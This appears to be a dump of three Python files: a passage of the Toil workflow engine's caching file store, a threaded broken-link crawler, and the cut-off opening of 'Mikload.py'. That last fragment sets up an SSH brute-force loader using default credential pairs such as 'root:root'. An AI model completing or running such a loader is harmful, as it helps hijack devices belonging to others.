raise CacheError('Attempting to recache a file %s.' % src)
else:
# Chmod the cached file. Cached files can never be modified.
os.chmod(cachedFile, stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH)
# Return the filesize of cachedFile to the job and increase the cached size
# The values passed here don't matter since rFS looks at the file only for
# the stat
self.returnFileSize(jobStoreFileID, localFilePath, lockFileHandle,
fileAlreadyCached=False)
if callingFunc == 'read':
logger.debug('CACHE: Read file with ID \'%s\' from the cache.' %
jobStoreFileID)
else:
logger.debug('CACHE: Added file with ID \'%s\' to the cache.' %
jobStoreFileID)
def returnFileSize(self, fileStoreID, cachedFileSource, lockFileHandle,
fileAlreadyCached=False):
"""
Returns the fileSize of the file described by fileStoreID to the job requirements pool
if the file was recently added to, or read from cache (A job that reads n bytes from
cache doesn't really use those n bytes as a part of it's job disk since cache is already
accounting for that disk space).
:param fileStoreID: fileStore ID of the file bein added to cache
:param str cachedFileSource: File being added to cache
:param file lockFileHandle: Open file handle to the cache lock file
:param bool fileAlreadyCached: A flag to indicate whether the file was already cached or
not. If it was, then it means that you don't need to add the filesize to cache again.
"""
fileSize = os.stat(cachedFileSource).st_size
cacheInfo = self._CacheState._load(self.cacheStateFile)
# If the file isn't cached, add the size of the file to the cache pool. However, if the
# nlink threshold is not 1 - i.e. it is 2 (it can only be 1 or 2), then don't do this
# since the size of the file is accounted for by the file store copy.
if not fileAlreadyCached and self.nlinkThreshold == 1:
cacheInfo.cached += fileSize
cacheInfo.sigmaJob -= fileSize
if not cacheInfo.isBalanced():
self.logToMaster('CACHE: The cache was not balanced on returning file size',
logging.WARN)
# Add the info to the job specific cache info
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobState.addToJobSpecFiles(fileStoreID, cachedFileSource, fileSize, True)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
@staticmethod
def _isHidden(filePath):
"""
This is a function that checks whether filePath is hidden
:param str filePath: Path to the file under consideration
:return: A boolean indicating whether the file is hidden or not.
:rtype: bool
"""
assert isinstance(filePath, (str, bytes))
# I can safely assume i will never see an empty string because this is always called on
# the results of an os.listdir()
return filePath[0] in ('.', '_')
def cleanCache(self, newJobReqs):
"""
Cleanup all files in the cache directory to ensure that at lead newJobReqs are available
for use.
:param float newJobReqs: the total number of bytes of files allowed in the cache.
"""
with self._CacheState.open(self) as cacheInfo:
# Add the new job's disk requirements to the sigmaJobDisk variable
cacheInfo.sigmaJob += newJobReqs
# Initialize the job state here. we use a partial in the jobSpecificFiles call so
# that this entire thing is pickleable. Based on answer by user Nathaniel Gentile at
# http://stackoverflow.com/questions/2600790
assert self.jobID not in cacheInfo.jobState
cacheInfo.jobState[self.jobID] = {
'jobName': self.jobName,
'jobReqs': newJobReqs,
'jobDir': self.localTempDir,
'jobSpecificFiles': defaultdict(partial(defaultdict,int)),
'filesToFSIDs': defaultdict(set),
'pid': os.getpid(),
'deferredFunctions': []}
# If the caching equation is balanced, do nothing.
if cacheInfo.isBalanced():
return None
# List of deletable cached files. A deletable cache file is one
# that is not in use by any other worker (identified by the number of symlinks to
# the file)
allCacheFiles = [os.path.join(self.localCacheDir, x)
for x in os.listdir(self.localCacheDir)
if not self._isHidden(x)]
allCacheFiles = [(path, os.stat(path)) for path in allCacheFiles]
# TODO mtime vs ctime
deletableCacheFiles = {(path, inode.st_mtime, inode.st_size)
for path, inode in allCacheFiles
if inode.st_nlink == self.nlinkThreshold}
# Sort in descending order of mtime so the first items to be popped from the list
# are the least recently created.
deletableCacheFiles = sorted(deletableCacheFiles, key=lambda x: (-x[1], -x[2]))
logger.debug('CACHE: Need %s bytes for new job. Detecting an estimated %s (out of a '
'total %s) bytes available for running the new job. The size of the cache '
'is %s bytes.', newJobReqs,
(cacheInfo.total - (cacheInfo.cached + cacheInfo.sigmaJob - newJobReqs)),
cacheInfo.total, cacheInfo.cached)
logger.debug('CACHE: Evicting files to make room for the new job.')
# Now do the actual file removal
totalEvicted = 0
while not cacheInfo.isBalanced() and len(deletableCacheFiles) > 0:
cachedFile, fileCreateTime, cachedFileSize = deletableCacheFiles.pop()
os.remove(cachedFile)
cacheInfo.cached -= cachedFileSize if self.nlinkThreshold != 2 else 0
totalEvicted += cachedFileSize
assert cacheInfo.cached >= 0
logger.debug('CACHE: Evicted file with ID \'%s\' (%s bytes)' %
(self.decodedFileID(cachedFile), cachedFileSize))
logger.debug('CACHE: Evicted a total of %s bytes. Available space is now %s bytes.',
totalEvicted,
(cacheInfo.total - (cacheInfo.cached + cacheInfo.sigmaJob - newJobReqs)))
if not cacheInfo.isBalanced():
raise CacheUnbalancedError()
def removeSingleCachedFile(self, fileStoreID):
"""
Removes a single file described by the fileStoreID from the cache forcibly.
"""
with self._CacheState.open(self) as cacheInfo:
cachedFile = self.encodedFileID(fileStoreID)
cachedFileStats = os.stat(cachedFile)
# We know the file exists because this function was called in the if block. So we
# have to ensure nothing has changed since then.
assert cachedFileStats.st_nlink <= self.nlinkThreshold, \
'Attempting to delete a global file that is in use by another job.'
assert cachedFileStats.st_nlink >= self.nlinkThreshold, \
'A global file has too FEW links at deletion time. Our link threshold is incorrect!'
# Remove the file size from the cached file size if the jobstore is not fileJobStore
# and then delete the file
os.remove(cachedFile)
if self.nlinkThreshold != 2:
cacheInfo.cached -= cachedFileStats.st_size
if not cacheInfo.isBalanced():
self.logToMaster('CACHE: The cache was not balanced on removing single file',
logging.WARN)
self.logToMaster('CACHE: Successfully removed file with ID \'%s\'.' % fileStoreID)
return None
def setNlinkThreshold(self, tempCacheDir):
# FIXME Can't do this at the top because of loopy (circular) import errors
# We can't predict in advance whether the job store will give us hard links or not.
# Even if the devices appear the same, the only way to know for sure is to try it.
from toil.jobStores.fileJobStore import FileJobStore
if isinstance(self.jobStore, FileJobStore):
# A bunch of code depends on nlinkThreshold==2 -> jobStore is FileJobStore.
# So only do this check if the job store is the file job store.
# Create an empty file.
emptyID = self.jobStore.getEmptyFileStoreID()
# Read it out.
# We have exclusive ownership of tempCacheDir at this point, so we
# can just write any name in there.
cachedFile = os.path.join(tempCacheDir, 'sniffLinkCount')
self.jobStore.readFile(emptyID, cachedFile, symlink=False)
# Check the link count
self.nlinkThreshold = os.stat(cachedFile).st_nlink
# Only 1 or 2 is allowed.
assert(self.nlinkThreshold == 1 or self.nlinkThreshold == 2)
# Clean up
os.unlink(cachedFile)
self.jobStore.deleteFile(emptyID)
else:
# Unless we are on the file job store, we need to have a link count threshold of 1.
# TODO: This relies on something the job store interface doesn't actually guarantee!
self.nlinkThreshold = 1
def _accountForNlinkEquals2(self, localFilePath):
"""
This is a utility function that accounts for the fact that if nlinkThreshold == 2, the
size of the file is accounted for by the file store copy of the file and thus the file
size shouldn't be added to the cached file sizes.
:param str localFilePath: Path to the local file that was linked to the file store copy.
"""
fileStats = os.stat(localFilePath)
assert fileStats.st_nlink >= self.nlinkThreshold
with self._CacheState.open(self) as cacheInfo:
cacheInfo.sigmaJob -= fileStats.st_size
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobState.updateJobReqs(fileStats.st_size, 'remove')
def returnJobReqs(self, jobReqs):
"""
This function returns the effective job requirements back to the pool after the job
completes. It also deletes the local copies of files with the cache lock held.
:param float jobReqs: Original size requirement of the job
"""
# Since we are only reading this job's specific values from the state file, we don't
# need a lock
jobState = self._JobState(self._CacheState._load(self.cacheStateFile
).jobState[self.jobID])
for x in list(jobState.jobSpecificFiles.keys()):
self.deleteLocalFile(x)
with self._CacheState.open(self) as cacheInfo:
cacheInfo.sigmaJob -= jobReqs
# assert cacheInfo.isBalanced() # commenting this out for now. God speed
class _CacheState(FileStore._StateFile):
"""
Utility class to read and write the cache lock file. Also for checking whether the
caching equation is balanced or not. It extends the _StateFile class to add other cache
related functions.
"""
@classmethod
@contextmanager
def open(cls, outer=None):
"""
This is a context manager that opens the cache state file and reads it into an object
that is returned to the user in the yield
"""
assert outer is not None
with outer.cacheLock():
cacheInfo = cls._load(outer.cacheStateFile)
yield cacheInfo
cacheInfo.write(outer.cacheStateFile)
def isBalanced(self):
"""
Checks for the inequality of the caching equation, i.e.
cachedSpace + sigmaJobDisk <= totalFreeSpace
Essentially, the sum of all cached file + disk requirements of all running jobs
should always be less than the available space on the system
:return: Boolean for equation is balanced (T) or not (F)
:rtype: bool
"""
return self.cached + self.sigmaJob <= self.total
def purgeRequired(self, jobReqs):
"""
Similar to isBalanced, however it looks at the actual state of the system and
decides whether an eviction is required.
:return: Is a purge required(T) or no(F)
:rtype: bool
"""
return not self.isBalanced()
# totalStats = os.statvfs(self.cacheDir)
# totalFree = totalStats.f_bavail * totalStats.f_frsize
# return totalFree < jobReqs
# Methods related to the deferred function logic
@classmethod
def findAndHandleDeadJobs(cls, nodeInfo, batchSystemShutdown=False):
"""
:param toil.fileStore.CachingFileStore._CacheState nodeInfo: The state of the node cache as
a _CacheState object
"""
# A list of tuples of (hashed job id, pid or process running job)
registeredJobs = [(jid, state['pid']) for jid, state in list(nodeInfo.jobState.items())]
for jobID, jobPID in registeredJobs:
if not cls._pidExists(jobPID):
jobState = CachingFileStore._JobState(nodeInfo.jobState[jobID])
logger.warning('Detected that job (%s) prematurely terminated. Fixing the state '
'of the cache.', jobState.jobName)
if not batchSystemShutdown:
logger.debug("Returning dead job's used disk to cache.")
# Delete the old work directory if it still exists, to remove unwanted nlinks.
# Do this only during the life of the program and dont' do it during the
# batch system cleanup. Leave that to the batch system cleanup code.
if os.path.exists(jobState.jobDir):
shutil.rmtree(jobState.jobDir)
nodeInfo.sigmaJob -= jobState.jobReqs
logger.debug('Running user-defined deferred functions.')
cls._runDeferredFunctions(jobState.deferredFunctions)
# Remove job from the cache state file
nodeInfo.jobState.pop(jobID)
def _registerDeferredFunction(self, deferredFunction):
with self._CacheState.open(self) as cacheInfo:
cacheInfo.jobState[self.jobID]['deferredFunctions'].append(deferredFunction)
logger.debug('Registered "%s" with job "%s".', deferredFunction, self.jobName)
class _JobState(object):
"""
This is a utility class to handle the state of a job in terms of it's current disk
requirements, working directory, and job specific files.
"""
def __init__(self, dictObj):
assert isinstance(dictObj, dict)
self.__dict__.update(dictObj)
@classmethod
def updateJobSpecificFiles(cls, outer, jobStoreFileID, filePath, fileSize, cached):
"""
This method will update the job specifc files in the job state object. It deals with
opening a cache lock file, etc.
:param toil.fileStore.CachingFileStore outer: An instance of CachingFileStore
:param str jobStoreFileID: job store Identifier for the file
:param str filePath: The path to the file
:param float fileSize: The size of the file (may be deprecated soon)
:param bool cached: T : F : None :: cached : not cached : mutably read
"""
with outer._CacheState.open(outer) as cacheInfo:
jobState = cls(cacheInfo.jobState[outer.jobID])
jobState.addToJobSpecFiles(jobStoreFileID, filePath, fileSize, cached)
cacheInfo.jobState[outer.jobID] = jobState.__dict__
def addToJobSpecFiles(self, jobStoreFileID, filePath, fileSize, cached):
"""
This is the real method that actually does the updations.
:param jobStoreFileID: job store Identifier for the file
:param filePath: The path to the file
:param fileSize: The size of the file (may be deprecated soon)
:param cached: T : F : None :: cached : not cached : mutably read
"""
# If there is no entry for the jsfID, make one. self.jobSpecificFiles is a default
# dict of default dicts and the absence of a key will return an empty dict
# (equivalent to a None for the if)
if not self.jobSpecificFiles[jobStoreFileID]:
self.jobSpecificFiles[jobStoreFileID][filePath] = fileSize
else:
# If there's no entry for the filepath, create one
if not self.jobSpecificFiles[jobStoreFileID][filePath]:
self.jobSpecificFiles[jobStoreFileID][filePath] = fileSize
# This should never happen
else:
raise RuntimeError()
# Now add the file to the reverse mapper. This will speed up cleanup and local file
# deletion.
self.filesToFSIDs[filePath].add(jobStoreFileID)
if cached:
self.updateJobReqs(fileSize, 'add')
def updateJobReqs(self, fileSize, actions):
"""
This method will update the current state of the disk required by the job after the
most recent cache operation.
:param fileSize: Size of the last file added/removed from the cache
:param actions: 'add' or 'remove'
"""
assert actions in ('add', 'remove')
multiplier = 1 if actions == 'add' else -1
# If the file was added to the cache, the value is subtracted from the requirements,
# and it is added if the file was removed form the cache.
self.jobReqs -= (fileSize * multiplier)
def isPopulated(self):
return self.__dict__ != {}
class HarbingerFile(object):
"""
Represents the placeholder file that harbinges the arrival of a local copy of a file in
the job store.
"""
def __init__(self, fileStore, fileStoreID=None, cachedFileName=None):
"""
Returns the harbinger file name for a cached file, or for a job store ID
:param class fileStore: The 'self' object of the fileStore class
:param str fileStoreID: The file store ID for an input file
:param str cachedFileName: The cache file name corresponding to a given file
"""
# We need either a file store ID, or a cached file name, but not both (XOR).
assert (fileStoreID is None) != (cachedFileName is None)
if fileStoreID is not None:
self.fileStoreID = fileStoreID
cachedFileName = fileStore.encodedFileID(fileStoreID)
else:
self.fileStoreID = fileStore.decodedFileID(cachedFileName)
self.fileStore = fileStore
self.harbingerFileName = '/.'.join(os.path.split(cachedFileName)) + '.harbinger'
def write(self):
self.fileStore.logToMaster('CACHE: Creating a harbinger file for (%s). '
% self.fileStoreID, logging.DEBUG)
with open(self.harbingerFileName + '.tmp', 'w') as harbingerFile:
harbingerFile.write(str(os.getpid()))
# Make this File read only to prevent overwrites
os.chmod(self.harbingerFileName + '.tmp', 0o444)
os.rename(self.harbingerFileName + '.tmp', self.harbingerFileName)
def waitOnDownload(self, lockFileHandle):
"""
This method is called when a readGlobalFile process is waiting on another process to
write a file to the cache.
:param lockFileHandle: The open handle to the cache lock file
"""
while self.exists():
logger.debug('CACHE: Waiting for another worker to download file with ID %s.'
% self.fileStoreID)
# Ensure that the process downloading the file is still alive. The PID will
# be in the harbinger file.
pid = self.read()
if FileStore._pidExists(pid):
# Release the file lock and then wait for a bit before repeating.
flock(lockFileHandle, LOCK_UN)
time.sleep(20)
# Grab the file lock before repeating.
flock(lockFileHandle, LOCK_EX)
else:
# The process that was supposed to download the file has died so we need
# to remove the harbinger.
self._delete()
def read(self):
return int(open(self.harbingerFileName).read())
def exists(self):
return os.path.exists(self.harbingerFileName)
def delete(self):
"""
Acquires the cache lock then attempts to delete the harbinger file.
"""
with self.fileStore.cacheLock():
self._delete()
def _delete(self):
"""
This function assumes you already have the cache lock!
"""
assert self.exists()
self.fileStore.logToMaster('CACHE: Deleting the harbinger file for (%s)' %
self.fileStoreID, logging.DEBUG)
os.remove(self.harbingerFileName)
# Functions related to async updates
def asyncWrite(self):
"""
A function to write files asynchronously to the job store such that subsequent jobs are
not delayed by a long write operation.
"""
try:
while True:
try:
# Block for up to two seconds waiting for a file
args = self.queue.get(timeout=2)
except Empty:
# Check if termination event is signaled
# (set in the event of an exception in the worker)
if self._terminateEvent.isSet():
raise RuntimeError("The termination flag is set, exiting")
continue
# Normal termination condition is getting None from queue
if args is None:
break
inputFileHandle, jobStoreFileID = args
cachedFileName = self.encodedFileID(jobStoreFileID)
# Ensure that the harbinger exists in the cache directory and that the PID
# matches that of this writing thread.
# If asyncWrite is ported to subprocesses instead of threads in the future,
# insert logic here to securely overwrite the harbinger file.
harbingerFile = self.HarbingerFile(self, cachedFileName=cachedFileName)
assert harbingerFile.exists()
assert harbingerFile.read() == int(os.getpid())
# We pass in a fileHandle, rather than the file-name, in case
# the file itself is deleted. The fileHandle itself should persist
# while we maintain the open file handle
with self.jobStore.updateFileStream(jobStoreFileID) as outputFileHandle:
shutil.copyfileobj(inputFileHandle, outputFileHandle)
inputFileHandle.close()
# Remove the file from the lock files
with self._pendingFileWritesLock:
self._pendingFileWrites.remove(jobStoreFileID)
# Remove the harbinger file
harbingerFile.delete()
except:
self._terminateEvent.set()
raise
def _updateJobWhenDone(self):
"""
Asynchronously update the status of the job on the disk, first waiting \
until the writing threads have finished and the input blockFn has stopped \
blocking.
"""
def asyncUpdate():
try:
# Wait till all file writes have completed
for i in range(len(self.workers)):
self.queue.put(None)
for thread in self.workers:
thread.join()
# Wait till input block-fn returns - in the event of an exception
# this will eventually terminate
self.inputBlockFn()
# Check the terminate event, if set we can not guarantee
# that the workers ended correctly, therefore we exit without
# completing the update
if self._terminateEvent.isSet():
raise RuntimeError("The termination flag is set, exiting before update")
# Indicate any files that should be deleted once the update of
# the job wrapper is completed.
self.jobGraph.filesToDelete = list(self.filesToDelete)
# Complete the job
self.jobStore.update(self.jobGraph)
# Delete any remnant jobs
list(map(self.jobStore.delete, self.jobsToDelete))
# Delete any remnant files
list(map(self.jobStore.deleteFile, self.filesToDelete))
# Remove the files to delete list, having successfully removed the files
if len(self.filesToDelete) > 0:
self.jobGraph.filesToDelete = []
# Update, removing emptying files to delete
self.jobStore.update(self.jobGraph)
except:
self._terminateEvent.set()
raise
finally:
# Indicate that _blockFn can return
# This code will always run
self.updateSemaphore.release()
# The update semaphore is held while the job is written to the job store
try:
self.updateSemaphore.acquire()
t = Thread(target=asyncUpdate)
t.start()
except:
# This is to ensure that the semaphore is released in a crash to stop a deadlock
# scenario
self.updateSemaphore.release()
raise
def _blockFn(self):
self.updateSemaphore.acquire()
self.updateSemaphore.release() # Release so that the block function can be recalled
# This works, because once acquired the semaphore will not be acquired
# by _updateJobWhenDone again.
return
@classmethod
def shutdown(cls, dir_):
"""
:param dir_: The directory that will contain the cache state file.
"""
cacheInfo = cls._CacheState._load(os.path.join(dir_, '_cacheState'))
cls.findAndHandleDeadJobs(cacheInfo, batchSystemShutdown=True)
shutil.rmtree(dir_)
def __del__(self):
"""
Cleanup function that is run when destroying the class instance that ensures that all the
file writing threads exit.
"""
self.updateSemaphore.acquire()
for i in range(len(self.workers)):
self.queue.put(None)
for thread in self.workers:
thread.join()
self.updateSemaphore.release()
class NonCachingFileStore(FileStore):
def __init__(self, jobStore, jobGraph, localTempDir, inputBlockFn):
self.jobStore = jobStore
self.jobGraph = jobGraph
self.jobName = str(self.jobGraph)
self.localTempDir = os.path.abspath(localTempDir)
self.inputBlockFn = inputBlockFn
self.jobsToDelete = set()
self.loggingMessages = []
self.filesToDelete = set()
super(NonCachingFileStore, self).__init__(jobStore, jobGraph, localTempDir, inputBlockFn)
# This will be defined in the `open` method.
self.jobStateFile = None
self.localFileMap = defaultdict(list)
@contextmanager
def open(self, job):
jobReqs = job.disk
startingDir = os.getcwd()
self.localTempDir = makePublicDir(os.path.join(self.localTempDir, str(uuid.uuid4())))
self.findAndHandleDeadJobs(self.workFlowDir)
self.jobStateFile = self._createJobStateFile()
freeSpace, diskSize = getFileSystemSize(self.localTempDir)
if freeSpace <= 0.1 * diskSize:
logger.warning('Starting job %s with less than 10%% of disk space remaining.',
self.jobName)
try:
os.chdir(self.localTempDir)
yield
finally:
diskUsed = getDirSizeRecursively(self.localTempDir)
logString = ("Job {jobName} used {percent:.2f}% ({humanDisk}B [{disk}B] used, "
"{humanRequestedDisk}B [{requestedDisk}B] requested) at the end of "
"its run.".format(jobName=self.jobName,
percent=(float(diskUsed) / jobReqs * 100 if
jobReqs > 0 else 0.0),
humanDisk=bytes2human(diskUsed),
disk=diskUsed,
humanRequestedDisk=bytes2human(jobReqs),
requestedDisk=jobReqs))
self.logToMaster(logString, level=logging.DEBUG)
if diskUsed > jobReqs:
self.logToMaster("Job used more disk than requested. Consider modifying the user "
"script to avoid the chance of failure due to incorrectly "
"requested resources. " + logString, level=logging.WARNING)
os.chdir(startingDir)
jobState = self._readJobState(self.jobStateFile)
deferredFunctions = jobState['deferredFunctions']
failures = self._runDeferredFunctions(deferredFunctions)
for failure in failures:
self.logToMaster('Deferred function "%s" failed.' % failure, logging.WARN)
# Finally delete the job from the worker
os.remove(self.jobStateFile)
def writeGlobalFile(self, localFileName, cleanup=False):
absLocalFileName = self._resolveAbsoluteLocalPath(localFileName)
cleanupID = None if not cleanup else self.jobGraph.jobStoreID
fileStoreID = self.jobStore.writeFile(absLocalFileName, cleanupID)
self.localFileMap[fileStoreID].append(absLocalFileName)
return FileID.forPath(fileStoreID, absLocalFileName)
def readGlobalFile(self, fileStoreID, userPath=None, cache=True, mutable=False, symlink=False):
if userPath is not None:
localFilePath = self._resolveAbsoluteLocalPath(userPath)
if os.path.exists(localFilePath):
raise RuntimeError(' File %s ' % localFilePath + ' exists. Cannot Overwrite.')
else:
localFilePath = self.getLocalTempFileName()
self.jobStore.readFile(fileStoreID, localFilePath, symlink=symlink)
self.localFileMap[fileStoreID].append(localFilePath)
return localFilePath
@contextmanager
def readGlobalFileStream(self, fileStoreID):
with self.jobStore.readFileStream(fileStoreID) as f:
yield f
def exportFile(self, jobStoreFileID, dstUrl):
self.jobStore.exportFile(jobStoreFileID, dstUrl)
def deleteLocalFile(self, fileStoreID):
try:
localFilePaths = self.localFileMap.pop(fileStoreID)
except KeyError:
raise OSError(errno.ENOENT, "Attempting to delete a non-local file")
else:
for localFilePath in localFilePaths:
os.remove(localFilePath)
def deleteGlobalFile(self, fileStoreID):
try:
self.deleteLocalFile(fileStoreID)
except OSError as e:
if e.errno == errno.ENOENT:
# the file does not exist locally, so no local deletion necessary
pass
else:
raise
self.filesToDelete.add(fileStoreID)
def _blockFn(self):
# there is no asynchronicity in this file store so no need to block at all
return True
def _updateJobWhenDone(self):
try:
# Indicate any files that should be deleted once the update of
# the job wrapper is completed.
self.jobGraph.filesToDelete = list(self.filesToDelete)
# Complete the job
self.jobStore.update(self.jobGraph)
# Delete any remnant jobs
list(map(self.jobStore.delete, self.jobsToDelete))
# Delete any remnant files
list(map(self.jobStore.deleteFile, self.filesToDelete))
# Remove the files to delete list, having successfully removed the files
if len(self.filesToDelete) > 0:
self.jobGraph.filesToDelete = []
# Update, removing emptying files to delete
self.jobStore.update(self.jobGraph)
except:
self._terminateEvent.set()
raise
def __del__(self):
"""
Cleanup function that is run when destroying the class instance. Nothing to do since there
are no async write events.
"""
pass
# Functions related to the deferred function logic
@classmethod
def findAndHandleDeadJobs(cls, nodeInfo, batchSystemShutdown=False):
"""
Look at the state of all jobs registered in the individual job state files, and handle them
(clean up the disk, and run any registered defer functions)
:param str nodeInfo: The location of the workflow directory on the node.
:param bool batchSystemShutdown: Is the batch system in the process of shutting down?
:return:
"""
# A list of tuples of (job name, pid or process running job, registered defer functions)
for jobState in cls._getAllJobStates(nodeInfo):
if not cls._pidExists(jobState['jobPID']):
# using same logic to prevent races as CachingFileStore._setupCache
myPID = str(os.getpid())
cleanupFile = os.path.join(jobState['jobDir'], '.cleanup')
with open(os.path.join(jobState['jobDir'], '.' + myPID), 'w') as f:
f.write(myPID)
while True:
try:
os.rename(f.name, cleanupFile)
except OSError as err:
if err.errno == errno.ENOTEMPTY:
with open(cleanupFile, 'r') as f:
cleanupPID = f.read()
if cls._pidExists(int(cleanupPID)):
# Cleanup your own mess. It's only polite.
os.remove(f.name)
break
else:
os.remove(cleanupFile)
continue
else:
raise
else:
logger.warning('Detected that job (%s) prematurely terminated. Fixing the '
'state of the job on disk.', jobState['jobName'])
if not batchSystemShutdown:
logger.debug("Deleting the stale working directory.")
# Delete the old work directory if it still exists. Do this only during
# the life of the program and dont' do it during the batch system
# cleanup. Leave that to the batch system cleanup code.
shutil.rmtree(jobState['jobDir'])
# Run any deferred functions associated with the job
logger.debug('Running user-defined deferred functions.')
cls._runDeferredFunctions(jobState['deferredFunctions'])
break
@staticmethod
def _getAllJobStates(workflowDir):
"""
Generator function that deserializes and yields the job state for every job on the node,
one at a time.
:param str workflowDir: The location of the workflow directory on the node.
:return: dict with keys (jobName, jobPID, jobDir, deferredFunctions)
:rtype: dict
"""
jobStateFiles = []
for root, dirs, files in os.walk(workflowDir):
for filename in files:
if filename == '.jobState':
jobStateFiles.append(os.path.join(root, filename))
for filename in jobStateFiles:
try:
yield NonCachingFileStore._readJobState(filename)
except IOError as e:
if e.errno == 2:
# job finished & deleted its jobState file since the jobState files were discovered
continue
else:
raise
@staticmethod
def _readJobState(jobStateFileName):
with open(jobStateFileName, 'rb') as fH:
state = dill.load(fH)
return state
def _registerDeferredFunction(self, deferredFunction):
with open(self.jobStateFile, 'rb') as fH:
jobState = dill.load(fH)
jobState['deferredFunctions'].append(deferredFunction)
with open(self.jobStateFile + '.tmp', 'wb') as fH:
dill.dump(jobState, fH)
os.rename(self.jobStateFile + '.tmp', self.jobStateFile)
logger.debug('Registered "%s" with job "%s".', deferredFunction, self.jobName)
def _createJobStateFile(self):
"""
Create the job state file for the current job and fill in the required
values.
:return: Path to the job state file
:rtype: str
"""
jobStateFile = os.path.join(self.localTempDir, '.jobState')
jobState = {'jobPID': os.getpid(),
'jobName': self.jobName,
'jobDir': self.localTempDir,
'deferredFunctions': []}
with open(jobStateFile + '.tmp', 'wb') as fH:
dill.dump(jobState, fH)
os.rename(jobStateFile + '.tmp', jobStateFile)
return jobStateFile
@classmethod
def shutdown(cls, dir_):
"""
:param dir_: The workflow directory that will contain all the individual worker directories.
"""
cls.findAndHandleDeadJobs(dir_, batchSystemShutdown=True)
class FileID(str):
"""
A small wrapper around Python's builtin string class. It is used to represent a file's ID in the file store, and
has a size attribute that is the file's size in bytes. This object is returned by importFile and writeGlobalFile.
"""
def __new__(cls, fileStoreID, *args):
return super(FileID, cls).__new__(cls, fileStoreID)
def __init__(self, fileStoreID, size):
# Don't pass an argument to parent class's __init__.
# In Python 3 we can have super(FileID, self) hand us object's __init__ which chokes on any arguments.
super(FileID, self).__init__()
self.size = size
@classmethod
def forPath(cls, fileStoreID, filePath):
return cls(fileStoreID, os.stat(filePath).st_size)
class WriteWatchingStream(object):
"""
A stream wrapping class that calls any functions passed to onWrite() with the number of bytes written for every write.
Not seekable.
"""
def __init__(self, backingStream):
"""
Wrap the given backing stream.
"""
self.backingStream = backingStream
# We have no write listeners yet
self.writeListeners = []
def onWrite(self, listener):
"""
Call the given listener with the number of bytes written on every write.
"""
self.writeListeners.append(listener)
# Implement the file API from https://docs.python.org/2.4/lib/bltin-file-objects.html
def write(self, data):
"""
Write the given data to the file.
"""
# Do the write
self.backingStream.write(data)
for listener in self.writeListeners:
# Send out notifications
listener(len(data))
def writelines(self, datas):
"""
Write each string from the given iterable, without newlines.
"""
for data in datas:
self.write(data)
def flush(self):
"""
Flush the backing stream.
"""
self.backingStream.flush()
def close(self):
"""
Close the backing stream.
"""
self.backingStream.close()
def shutdownFileStore(workflowDir, workflowID):
"""
Run the deferred functions from any prematurely terminated jobs still lingering on the system
and carry out any necessary filestore-specific cleanup.
This is a destructive operation and it is important to ensure that there are no other running
processes on the system that are modifying or using the file store for this workflow.
This is the intended to be the last call to the file store in a Toil run, called by the
batch system cleanup function upon batch system shutdown.
:param str workflowDir: The path to the cache directory
:param str workflowID: The workflow ID for this invocation of the workflow
"""
cacheDir = os.path.join(workflowDir, cacheDirName(workflowID))
if os.path.exists(cacheDir):
# The presence of the cacheDir suggests this was a cached run. We don't need the cache lock
# for any of this since this is the final cleanup of a job and there should be no other
# conflicting processes using the cache.
CachingFileStore.shutdown(cacheDir)
else:
# This absence of cacheDir suggests otherwise.
NonCachingFileStore.shutdown(workflowDir)
class CacheError(Exception):
"""
Error Raised if the user attempts to add a non-local file to cache
"""
def __init__(self, message):
super(CacheError, self).__init__(message)
class CacheUnbalancedError(CacheError):
"""
Raised if file store can't free enough space for caching
"""
message = 'Unable unable to free enough space for caching. This error frequently arises due ' \
'to jobs using more disk than they have requested. Turn on debug logging to see ' \
'more information leading up to this error through cache usage logs.'
def __init__(self):
super(CacheUnbalancedError, self).__init__(self.message)
class IllegalDeletionCacheError(CacheError):
"""
Error Raised if the Toil detects the user deletes a cached file
"""
def __init__(self, deletedFile):
message = 'Cache tracked file (%s) deleted explicitly by user. Use deleteLocalFile to ' \
'delete such files.' % deletedFile
super(IllegalDeletionCacheError, self).__init__(message)
class InvalidSourceCacheError(CacheError):
"""
Error Raised if the user attempts to add a non-local file to cache
"""
def __init__(self, message):
super(InvalidSourceCacheError, self).__init__(message)
|
snippet.py
|
from bs4 import BeautifulSoup,SoupStrainer
import urllib.request
import colorama,re,queue,threading
from colorama import Fore
from urllib.parse import *
class check_link():
def __init__(self,address):
self.address=address
def check(self,address):
try:
req=urllib.request.Request(url=address)
resp=urllib.request.urlopen(req)
if resp.status in [400,404,403,408,409,501,502,503]:print (Fore.RED+resp.status+"-"+resp.reason+"-->"+address)
else: print (Fore.GREEN+"no problem in-->"+address)
except Exception as e:
print (Fore.YELLOW+"{}-{}".format(e,address))
pass
def pattern_adjust(a):
try:
if re.match('^#' ,a):return 0
r=urlsplit(a)
if r.scheme=='' and (r.netloc!='' or r.path!=''):
d=urlunsplit(r)
if re.match('^//' ,d):
m= re.search('(?<=//)\S+', d)
d=m.group(0)
m="https://"+d
return m
elif r.scheme=='' and r.netloc=='':
return address+a
else:return a
except Exception as e:
pass
def extract_link(address):
tags= {'a':'href', 'img':'src', 'script':'src', 'link':'href' }
for key,value in iter(tags.items()):
try:
res=urllib.request.urlopen(address)
response=res.read().decode('utf-8') #needs improvement
for link in BeautifulSoup(response,"html.parser",parse_only=SoupStrainer(key)):
if link.has_attr(value):
p=pattern_adjust(link[value])
if p!=0 and str(p)!='None':
newcheck=check_link(p)
newcheck.check(p)
if p not in hyperlinks:
hyperlinks.add(p)
if website.split('.')[1] in p:#needs improvement
if not website.endswith(('.png','.jpeg','.js','jpg')):
q.put(p)
except Exception as e:
print (e,address)
def threader():
while True:
value=q.get()
result=extract_link(value)
q.task_done()
if __name__=="__main__":
colorama.init()
q=queue.Queue()
global hyperlinks,website
hyperlinks=set()
website=input("Please enter the website address: ")
for x in range(30):
t=threading.Thread(target=threader)
t.deamon=True
t.start()
q.put(website.strip())
q.join()
|
Mikload.py
|
#ulimit -n 999999
#Made simply for Kowai
#Made by slumptheogod @telnut on instagram
#line 86 is where u can edit ranges in the script Loli
import threading, paramiko, random, socket, time, sys
paramiko.util.log_to_file("/dev/null")
blacklisted = ["127.0","10.0","192.168"] #You can these out add or whatever u want lol
#server_ip = useless atm
passwords = ["support:support"]
if sys.argv[4] == "root":
passwords = ["root:root"]
if sys.argv[4] == "guest":
